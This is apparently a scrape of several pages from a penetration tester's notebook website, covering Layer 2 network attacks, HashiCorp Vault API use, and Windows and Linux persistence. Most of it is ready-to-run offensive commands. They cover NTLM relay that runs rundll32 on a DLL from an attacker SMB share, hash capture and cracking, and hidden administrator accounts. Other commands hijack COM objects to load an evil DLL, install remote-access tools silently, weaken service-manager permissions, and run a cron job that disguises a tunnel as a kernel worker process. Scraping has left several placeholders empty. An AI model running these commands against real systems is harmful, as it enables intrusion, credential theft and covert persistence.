/opt/jfrog/artifactory/app/third-party/java/bin/java -jar /opt/derby/db-derby-10.15.1.3-bin/lib/derbyrun.jar ij ij> connect 'jdbc:derby:/tmp/dbcopy/derby'; ij> select * from access_users; Copy $ sudo bash -c "echo 'snovvcrash*=Passw0rd!' > /opt/jfrog/artifactory/var/etc/access/bootstrap.creds" $ sudo chmod 600 /opt/jfrog/artifactory/var/etc/access/bootstrap.creds $ sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop $ sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start $ sudo grep "Create admin user" /opt/jfrog/artifactory/var/log/console.log --- # VLAN Hopping | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/vlan-hopping.md) . * [https://en.wikipedia.org/wiki/VLAN\_hopping](https://en.wikipedia.org/wiki/VLAN_hopping) * [https://bwlryq.net/posts/vlan\_hopping/](https://bwlryq.net/posts/vlan_hopping/) [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/vlan-hopping#double-vlan-tagging) Double VLAN Tagging ------------------------------------------------------------------------------------------------------------------------ * [https://notsosecure.com/exploiting-vlan-double-tagging/](https://notsosecure.com/exploiting-vlan-double-tagging/) * [\[PDF\] VLAN Hopping Attack (Haboob Team)](https://www.exploit-db.com/docs/english/45050-vlan-hopping-attack.pdf) Last updated 3 years ago --- # SNACs Abuse | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/snacs-abuse.md) . * [https://www.blackhillsinfosec.com/analyzing-arp-to-discover-exploit-stale-network-address-configurations/](https://www.blackhillsinfosec.com/analyzing-arp-to-discover-exploit-stale-network-address-configurations/) * [https://github.com/arch4ngel/eavesarp](https://github.com/arch4ngel/eavesarp) * [https://github.com/s0i37/net/blob/main/arp\_snac.py](https://github.com/s0i37/net/blob/main/arp_snac.py) Actively analyze ARP traffic and hunt for SNACs (Stale Network Address Configurations): Copy $ sudo python3 eavesarp.py capture -i eth0 -ar -dr [--blacklist 192.168.1.11] If a SNAC if found (can be detected, for example, when a host has moved from one IP to another and its DNS A record not matching its DNS PTR record anymore) so that some application in the network is still trying to send sensitive data to the _stale_ IP address (because it may simply be hard-coded in the app), an adversary can set an alias for their interface pretending to be that host with the _stale_ IP and collect all the traffic intended for it: Copy # Check again with tcpdump $ sudo tcpdump -nvv -i eth0 "src host and arp" # Abuse it! $ sudo tcpdump -nA -i eth0 "src host and (dst port 80 or dst port 443)" Or $ sudo tcpdump -nvv -i eth0 -s 65535 -w eavesarp.pcap "host " $ sudo ip addr add /24 dev eth0 # Clean up $ sudo ip addr del /24 dev eth0 Last updated 3 years ago --- # HashiCorp Vault | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/devops/hashicorp-vault.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/devops/hashicorp-vault#basic-api-examples) Basic API Examples -------------------------------------------------------------------------------------------------------------------- Auth List Mounts (Engines) List Path Get Secret Revert Token vault\_auth.sh Copy #!/usr/bin/env bash VAULT_ADDR="https://vault.megacorp.local" ROLE_ID="00000000-0000-0000-0000-000000000000" SECRET_ID="ffffffff-ffff-ffff-ffff-ffffffffffff" TOKEN=$(curl -sX POST "${VAULT_ADDR}/v1/auth/approle/login" \ --data "{\"role_id\": \"${ROLE_ID}\", \"secret_id\": \"${SECRET_ID}\"}" | jq -r .auth.client_token) echo "[+] Vault Token: $TOKEN" vault\_list\_mounts.sh Copy #!/usr/bin/env bash VAULT_ADDR="https://vault.megacorp.local" TOKEN="" curl -sH "X-Vault-Token: ${TOKEN}" -X GET "${VAULT_ADDR}/v1/sys/mounts" | jq vault\_list\_path.sh Copy #!/usr/bin/env bash VAULT_ADDR="https://vault.megacorp.local" TOKEN="" curl -sH "X-Vault-Token: ${TOKEN}" -X LIST "${VAULT_ADDR}/v1/${1}/metadata/" | jq vault\_get\_secret.sh Copy #!/usr/bin/env bash VAULT_ADDR="https://vault.megacorp.local" TOKEN="" curl -sH "X-Vault-Token: ${TOKEN}" -X GET "${VAULT_ADDR}/v1/${1}/data/${2}" | jq Last updated 1 year ago vault\_revert\_token.sh Copy #!/usr/bin/env bash VAULT_ADDR="https://vault.megacorp.local" TOKEN="" curl -sH "X-Vault-Token: ${TOKEN}" -X POST "${VAULT_ADDR}/v1/auth/token/revoke-self" --- # DHCPv6 Spoofing | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/dhcpv6-spoofing.md) . * [https://g-laurent.blogspot.com/2021/12/responder-and-ipv6-attacks.html](https://g-laurent.blogspot.com/2021/12/responder-and-ipv6-attacks.html) [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/dhcpv6-spoofing#mitm6) mitm6 ----------------------------------------------------------------------------------------------- * [https://github.com/fox-it/mitm6](https://github.com/fox-it/mitm6) * [https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/](https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/) * [https://intrinium.com/mitm6-pen-testing/](https://intrinium.com/mitm6-pen-testing/) Install: Copy $ git clone https://github.com/fox-it/mitm6 ~/tools/mitm6 && cd ~/tools/mitm6 $ python3 setup.py install Or $ pipx install -f "git+https://github.com/fox-it/mitm6.git" Generate a list of targets for NTLM relay and prepare a C2 listener and stager: Copy $ cme smb 192.168.1.0/24 --gen-relay-list relay.txt Start SMB server to capture NTLM hashes and serve the stager: Copy $ smbserver.py -smb2support share `pwd` | tee -a ~/ws/log/mitm6-smbserver.out Get ready to relay authentication and try executing a command: Copy $ ntlmrelayx.py -6 -tf relay.txt -wh attacker-wpad -c 'cmd /c C:\Windows\System32\rundll32.exe \\10.10.13.37\share\evil.dll, SVywATCKorN' --no-smb-server --no-wcf-server --no-raw-server Start MitMing: Parse, sort and save NTLM hashes: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/dhcpv6-spoofing#attack-vectors) Attack vectors Grab hashes with `smbserver.py` (passive): 1. `mitm6.py` poisons IPv6 DNS entries for all hosts in the `/24` network. 2. Victims start to use attacker's machine as the primary DNS server. 3. `mitm6.py` on the attacker's machine acts like a rogue DNS server and responds with the attacker's IP for all incoming queries. 4. `smbserver.py` collects hashes during SMB requests from victims. Relay authentication with ntlmrelayx.py (active): 1. `mitm6.py` poisons IPv6 DNS entries for all hosts in the `/24` network. 2. Victims start to use attacker's machine as the primary DNS server. 3. `mitm6.py` on the attacker's machine acts like a rogue DNS server, `ntlmrelayx.py` serves a custom WPAD file with an inexistent hostname (which will be resolved to the attacker's IP anyway) and acts like a rogue proxy server and `mitm6.py` responds with the attacker's IP for all the incoming DNS queries. 4. Victims grab the WPAD file and ask the rogue IPv6 DNS server (attacker's machine) to resolve its location - resolved to attacker's machine. 5. Victims go to the rogue proxy server and there `ntlmrelayx.py` responses with `HTTP 407 Proxy Authentication`. Last updated 8 months ago * [mitm6](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/dhcpv6-spoofing#mitm6) * [Attack vectors](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/dhcpv6-spoofing#attack-vectors) Copy $ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn Copy # Users $ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | cut -c 5- | grep -v '\$' > net-ntlmv2.mitm6 $ sort -u -t: -k1,1 net-ntlmv2.mitm6 ~/ws/loot/net-ntlmv2.txt > t $ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.mitm6 # Machines $ cat ~/ws/log/mitm6-smbserver.out | grep 'authenticated successfully' -A1 | grep aaaaaaaaaaaaaaaa | grep '\$' | cut -c 5- | sort -u -t: -k1,1 --- # LLMNR / NBNS Poisoning | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/llmnr-nbns-poisoning.md) . [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/llmnr-nbns-poisoning#responder) Responder ------------------------------------------------------------------------------------------------------------ * [https://github.com/SpiderLabs/Responder](https://github.com/SpiderLabs/Responder) * [https://github.com/lgandx/Responder](https://github.com/lgandx/Responder) * [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/) * [https://markclayton.github.io/where-are-my-hashes-responder-observations.html](https://markclayton.github.io/where-are-my-hashes-responder-observations.html) Install: Copy $ git clone https://github.com/lgandx/Responder ~/tools/Responder && cd ~/tools/Responder Run: Copy $ sudo ./Responder.py -I eth0 -Av $ sudo ./Responder.py -I eth0 -wd -P -v Parse, sort and save hashes: Copy # Users $ cat logs/*.txt | grep -a . | grep -a -v -e 'logs/' -e '\$' | sort -u -t: -k1,1 > net-ntlmv2.responder $ sort -u -t: -k1,1 net-ntlmv2.responder ~/ws/loot/net-ntlmv2.txt > t $ mv t ~/ws/loot/net-ntlmv2.txt && rm net-ntlmv2.responder # Machines $ cat logs/*.txt | grep -a '\$' | sort -u -t: -k1,1 Monitor new hashes: Crack: [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/llmnr-nbns-poisoning#inveigh) Inveigh -------------------------------------------------------------------------------------------------------- * [https://github.com/Kevin-Robertson/Inveigh](https://github.com/Kevin-Robertson/Inveigh) [](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/llmnr-nbns-poisoning#inveighzero) InveighZero ---------------------------------------------------------------------------------------------------------------- * [https://github.com/Kevin-Robertson/InveighZero](https://github.com/Kevin-Robertson/InveighZero) Last updated 1 year ago * [Responder](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/llmnr-nbns-poisoning#responder) * [Inveigh](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/llmnr-nbns-poisoning#inveigh) * [InveighZero](https://ppn.snovvcra.sh/pentest/infrastructure/networks/l2/llmnr-nbns-poisoning#inveighzero) Copy $ sudo inotifywait -rm /usr/share/responder/logs | grep NTLMv1 Copy $ hashcat -m 5600 -O -a 0 -w 3 --session=netntlmv2 -o net-ntlmv2.out net-ntlmv2.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule --username Copy PS > Invoke-Inveigh [-IP '10.10.13.37'] -ConsoleOutput Y -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y Copy PS > .\InveighZero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N] --- # Persistence | Pentester's Promiscuous Notebook For the complete documentation index, see [llms.txt](https://ppn.snovvcra.sh/llms.txt) . This page is also available as [Markdown](https://ppn.snovvcra.sh/pentest/infrastructure/persistence.md) . * [https://xakep.ru/2021/03/03/persistence-cheatsheet/](https://xakep.ru/2021/03/03/persistence-cheatsheet/) [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#windows) Windows ----------------------------------------------------------------------------------- * [https://persistence-info.github.io/](https://persistence-info.github.io/) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#registry) Registry #### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#ntuser.man) NTUSER.MAN * [https://deceptiq.com/blog/ntuser-man-registry-persistence](https://deceptiq.com/blog/ntuser-man-registry-persistence) * [https://github.com/stormshield/HiveSwarming](https://github.com/stormshield/HiveSwarming) * [https://www.praetorian.com/blog/corrupting-the-hive-mind-persistence-through-forgotten-windows-internals/](https://www.praetorian.com/blog/corrupting-the-hive-mind-persistence-through-forgotten-windows-internals/) * [https://github.com/praetorian-inc/swarmer](https://github.com/praetorian-inc/swarmer) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#scheduled-tasks) Scheduled Tasks * [https://github.com/VirtualAlllocEx/Taskschedule-Persistence-Download-Cradles](https://github.com/VirtualAlllocEx/Taskschedule-Persistence-Download-Cradles) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#hidden-local-user) Hidden Local User * [https://github.com/3gstudent/Windows-User-Clone](https://github.com/3gstudent/Windows-User-Clone) * [https://github.com/wgpsec/CreateHiddenAccount](https://github.com/wgpsec/CreateHiddenAccount) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#dollar-sign) Dollar Sign * [https://chaah.awankloud.my/redteaming-tips-creating-a-hidden-user/](https://chaah.awankloud.my/redteaming-tips-creating-a-hidden-user/) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#specialaccounts) SpecialAccounts #### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#suborner) Suborner * [https://r4wsec.com/notes/the\_suborner\_attack/](https://r4wsec.com/notes/the_suborner_attack/) * [https://github.com/r4wd3r/Suborner](https://github.com/r4wd3r/Suborner) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#com-hijacking) COM Hijacking Locate good targets to hijack with Procmon filters: * _Operation_ is **RegOpenKey** * _Result_ is **NAME NOT FOUND** * _Path_ is **InprocServer32** (in-process server allowing the specified DLL to be loaded into current process memory space) Locate CLSIDs from scheduled tasks: Check if a COM component exists under a relevant registry hive by its CLSID: If it exists under `HKLM` but does **not** exists under `HKCU` hive, we can hijack this COM component by creating a new item in the latter path: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#rid-hijacking) RID Hijacking * [https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html](https://r4wsecurity.blogspot.com/2017/12/rid-hijacking-maintaining-access-on.html) * [https://github.com/r4wd3r/RID-Hijacking](https://github.com/r4wd3r/RID-Hijacking) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#lnk-shortcuts) .LNK Shortcuts * [https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence](https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence) * [https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Create-HotKeyLNK.ps1](https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/Create-HotKeyLNK.ps1) * [https://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/](https://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#vnc) VNC #### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#tigervnc-winvnc) TigerVNC (WinVNC) * [https://github.com/klsecservices/Invoke-Vnc](https://github.com/klsecservices/Invoke-Vnc) * [https://github.com/rapid7/metasploit-framework/tree/master/external/source/vncdll/vncdll](https://github.com/rapid7/metasploit-framework/tree/master/external/source/vncdll/vncdll) * [https://github.com/rsmudge/vncdll](https://github.com/rsmudge/vncdll) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#tightvnc) TightVNC Download and unpack MSI: Create a password (8 chars): Install [Vinagre](https://wiki.gnome.org/Apps/Vinagre) client: Install TightVNC server: Uninstall TightVNC server: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#anydesk) AnyDesk * [https://support.anydesk.com/knowledge/use-cases-for-the-command-line-interface](https://support.anydesk.com/knowledge/use-cases-for-the-command-line-interface) * [https://support.anydesk.com/knowledge/command-line-interface-for-windows](https://support.anydesk.com/knowledge/command-line-interface-for-windows) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#chrome-remote-desktop) Chrome Remote Desktop * [https://trustedsec.com/blog/abusing-chrome-remote-desktop-on-red-team-operations-a-practical-guide](https://trustedsec.com/blog/abusing-chrome-remote-desktop-on-red-team-operations-a-practical-guide) Deploy MSI (if Chrome Remote Desktop is NOT already in use on client): Backup current config (if Chrome Remote Desktop is already in use on client): Register device (sometimes `CurrentVersion` path not working, explicit existing version provision may help): Restore config (and lose access) if needed: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#keep-awake) Keep Awake Disable sleep when plugged in / on battery: Disable hibernate when plugged in / on battery: Disable sleep when closing laptop lid (plugged in / on battery): Apply all settings: Create a scheduled task to wake up: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#sddl-manipulation) SDDL Manipulation * [https://0xv1n.github.io/posts/scmanager/](https://0xv1n.github.io/posts/scmanager/) * [https://gist.github.com/pich4ya/c15af736f0f494c1a560e6c837d77828](https://gist.github.com/pich4ya/c15af736f0f494c1a560e6c837d77828) Backup current SDDL for `scmanager`: Change it to allow everyone to create a service: Create a service that will auto run at next reboot: Check if `scmanager` SDDL has been modified: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#tools) Tools #### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#sharpersist) SharPersist * [https://github.com/fireeye/SharPersist](https://github.com/fireeye/SharPersist) [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#linux) Linux ------------------------------------------------------------------------------- ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#cron) Cron Quicky crontab without duplicating backdoor process if already running: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#ssh) SSH Add a temporary rule allowing connections from your IP: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#ssh-tunnel-in-crontab) SSH Tunnel in Crontab Attacker's box: Victim's box: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#global-socket) Global Socket * [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/) #### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#install) Install Victim's box: #### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#connect) Connect Attacker's box: #### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#clean-up) Clean Up Victim's box: ### [](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#rootkits) Rootkits * [0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485](https://0x00sec.org/t/kernel-rootkits-getting-your-hands-dirty/1485) * [https://github.com/eeriedusk/nysm](https://github.com/eeriedusk/nysm) Last updated 4 months ago * [Windows](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#windows) * [Registry](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#registry) * [Scheduled Tasks](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#scheduled-tasks) * [Hidden Local User](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#hidden-local-user) * [COM Hijacking](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#com-hijacking) * [RID Hijacking](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#rid-hijacking) * [.LNK Shortcuts](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#lnk-shortcuts) * [VNC](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#vnc) * [AnyDesk](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#anydesk) * [Chrome Remote Desktop](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#chrome-remote-desktop) * [Keep Awake](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#keep-awake) * [SDDL Manipulation](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#sddl-manipulation) * [Tools](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#tools) * [Linux](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#linux) * [Cron](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#cron) * [SSH](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#ssh) * [SSH Tunnel in Crontab](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#ssh-tunnel-in-crontab) * [Global Socket](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#global-socket) * [Rootkits](https://ppn.snovvcra.sh/pentest/infrastructure/persistence#rootkits) Copy Cmd > net1.exe user snovvcrash$ Passw0rd! /add Copy PS > New-Item -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name SpecialAccounts PS > New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\" -Name snovvcrash -PropertyType DWORD -Value 0 -Force Copy PS > whoami nt authority\system PS > .\Suborner.exe /username:snovvcrash$ /password:Passw0rd! schtask.ps1 Copy $Tasks = Get-ScheduledTask foreach ($Task in $Tasks) { if ($Task.Actions.ClassId -ne $null) { if ($Task.Triggers.Enabled -eq $true) { if ($Task.Principal.GroupId -eq "Users") { Write-Host "Task Name: " $Task.TaskName Write-Host "Task Path: " $Task.TaskPath Write-Host "CLSID: " $Task.Actions.ClassId Write-Host } } } } Copy PS > Get-ChildItem -Path "Registry::HKCR\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" PS > Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize PS > Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize Copy PS > New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" PS > New-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -Name "InprocServer32" -Value "C:\Windows\Tasks\evil.dll" PS > New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32" -Name "ThreadingModel" -Value "Both" PS > Get-ItemProperty -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}\InprocServer32" Copy curl https://www.tightvnc.com/download/2.8.85/tightvnc-2.8.85-gpl-setup-64bit.msi -o tightvnc.msi msiexec /qb /a tightvnc.msi TARGETDIR=%cd%\TightVNC move TightVNC\PFiles\TightVNC\tvnserver.exe . move TightVNC\PFiles\TightVNC\screenhooks32.dll . rmdir TightVNC /s /q del tightvnc.msi Copy printf "PASSWOR\0" | openssl enc -des-cbc --nopad --nosalt -K 0123456789abcdef -iv 0000000000000000 -provider legacy -provider default | xxd -p f408495e54374919 Copy wget http://ftp.de.debian.org/debian/pool/main/v/vinagre/vinagre_3.22.0-8.1_amd64.deb sudo apt install ./vinagre_3.22.0-8.1_amd64.deb && rm vinagre_3.22.0-8.1_amd64.deb Copy New-Item -Path "HKLM:\Software\TightVNC" -Force > $null New-Item -Path "HKLM:\Software\TightVNC\Server" -Force > $null Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "Password" -Value ([byte[]](0xf4,0x08,0x49,0x5e,0x54,0x37,0x49,0x19)) -Type Binary -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RfbPort" -Value 31337 -Type DWord -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RunControlInterface" -Value 0 -Type DWord -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RemoveWallpaper" -Value 0 -Type DWord -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "AcceptHttpConnections" -Value 0 -Type DWord -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "LoopbackOnly" -Value 0 -Type DWord -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "AllowLoopback" -Value 1 -Type DWord -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "RunAsService" -Value 1 -Type DWord -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "ServiceDisplayName" -Value "TightVNC Server" -Type String -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "UseVncAuthentication" -Value 1 -Type DWord -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "UseControlAuthentication" -Value 1 -Type DWord -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "QueryAcceptOnTimeout" -Value 1 -Type DWord -Force Set-ItemProperty -Path "HKLM:\Software\TightVNC\Server" -Name "QueryTimeout" -Value 10 -Type DWord -Force # cd C:\path\to\tvnserver_exe\and\screenhooks32_dll Start-Process -FilePath .\tvnserver.exe -ArgumentList "-install -silent" -NoNewWindow -Wait Start-Service -Name "TightVNC Server" Get-Service "TightVNC Server" Copy # cd C:\path\to\tvnserver_exe\and\screenhooks32_dll Start-Process -FilePath .\tvnserver.exe -ArgumentList "-remove -silent" -NoNewWindow -Wait Get-Service "TightVNC Server" Remove-Item -Path "HKLM:\Software\TightVNC" -Recurse -Force Stop-Process -Name tvnserver -Force rm tvnserver.exe, screenhooks32.dll Copy Cmd > bitsadmin /transfer job1 https://download.anydesk.com/AnyDesk-CM.exe C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe Cmd > C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe --install C:\Users\snovvcrash\AppData\Local\AnyDesk --start-with-win --silent Cmd > del C:\Users\snovvcrash\AppData\Local\Temp\anydesk.exe Cmd > echo Passw0rd! | C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --set-password Cmd > cmd /c "for /f ""delims="" %i in ('C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --get-id') do echo %i" Cmd > C:\Users\snovvcrash\AppData\Local\AnyDesk\AnyDesk.exe --remove Copy Cmd > msiexec /i https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi /qn Copy Cmd > copy /y "%PROGRAMDATA%\Google\Chrome Remote Desktop\host.json" "%PROGRAMDATA%\Google\Chrome Remote Desktop\host.json.bak" Cmd > copy /y "%PROGRAMDATA%\Google\Chrome Remote Desktop\host_unprivileged.json" "%PROGRAMDATA%\Google\Chrome Remote Desktop\host_unprivileged.json.bak" PS > cp -Force "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host.json" "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host.json.bak" PS > cp -Force "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host_unprivileged.json" "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host_unprivileged.json.bak" Copy Cmd > "%PROGRAMFILES(X86)%\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=%COMPUTERNAME% --pin=313337 PS > & "${Env:PROGRAMFILES(X86)}\Google\Chrome Remote Desktop\CurrentVersion\remoting_start_host.exe" --code="" --redirect-url="https://remotedesktop.google.com/_/oauthredirect" --name=$Env:COMPUTERNAME --pin=313337 Copy Cmd > copy /y "%PROGRAMDATA%\Google\Chrome Remote Desktop\host.json.bak" "%PROGRAMDATA%\Google\Chrome Remote Desktop\host.json" Cmd > copy /y "%PROGRAMDATA%\Google\Chrome Remote Desktop\host_unprivileged.json.bak" "%PROGRAMDATA%\Google\Chrome Remote Desktop\host_unprivileged.json" PS > cp -Force "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host.json.bak" "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host.json" PS > cp -Force "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host_unprivileged.json.bak" "${Env:PROGRAMDATA}\Google\Chrome Remote Desktop\host_unprivileged.json" Copy Cmd > powercfg /change standby-timeout-ac 0 Cmd > powercfg /change standby-timeout-dc 0 Copy Cmd > powercfg /change hibernate-timeout-ac 0 Cmd > powercfg /change hibernate-timeout-dc 0 Copy Cmd > powercfg -setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0 Cmd > powercfg -setdcvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 0 Copy Cmd > powercfg -SetActive SCHEME_CURRENT Copy PS > schtasks /create /tn "Microsoft\Windows\WindowsUpdate\Refresh Group Policy" /tr "cmd.exe /c exit" /sc daily /st 23:00:00 /ru "SYSTEM" /f PS > Get-ScheduledTask -TaskName "Refresh Group Policy" PS > $settings = New-ScheduledTaskSettingsSet -WakeToRun PS > Set-ScheduledTask -TaskName "Refresh Group Policy" -TaskPath "Microsoft\Windows\WindowsUpdate\" -Settings $settings PS > powercfg /waketimers Copy Cmd > sc.exe sdshow scmanager Copy Cmd > sc.exe sdset scmanager D:(A;;KA;;;WD) Copy Cmd > sc.exe create lpesvc displayName= "lpesvc" binPath= "C:\Windows\System32\net.exe localgroup administrators snovvcrash /add" obj= LocalSystem start= auto Copy PS > ConvertFrom-SddlString -Sddl $(sc.exe sdshow scmanager | select -Last 1) | select -Expand DiscretionaryAcl Copy beacon> execute-assembly SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc " -n "Updater" -m add -o hourly beacon> execute-assembly SharPersist.exe -t startupfolder -f "UserEnvSetup" -m add beacon> execute-assembly SharPersist.exe -t reg -c "C:\ProgramData\Updater.exe" -a "/q /n" -k "hkcurun" -v "Updater" -m add Copy $ echo 'if [ -z "$(pwdx $(pgrep chisel) 2>/dev/null | grep home)" ]; then $(cd /home/user/.local/lib; export PATH=.:$PATH; exec -a "kworker/0:2-events" chisel & disown); fi' > /home/user/.local/.1 $ (crontab -l; echo '* * * * * /home/user/.local/.1') | crontab - Copy $ sudo iptables -A INPUT -p tcp -s 10.10.13.37 --dport 22 -j ACCEPT callback.sh Copy 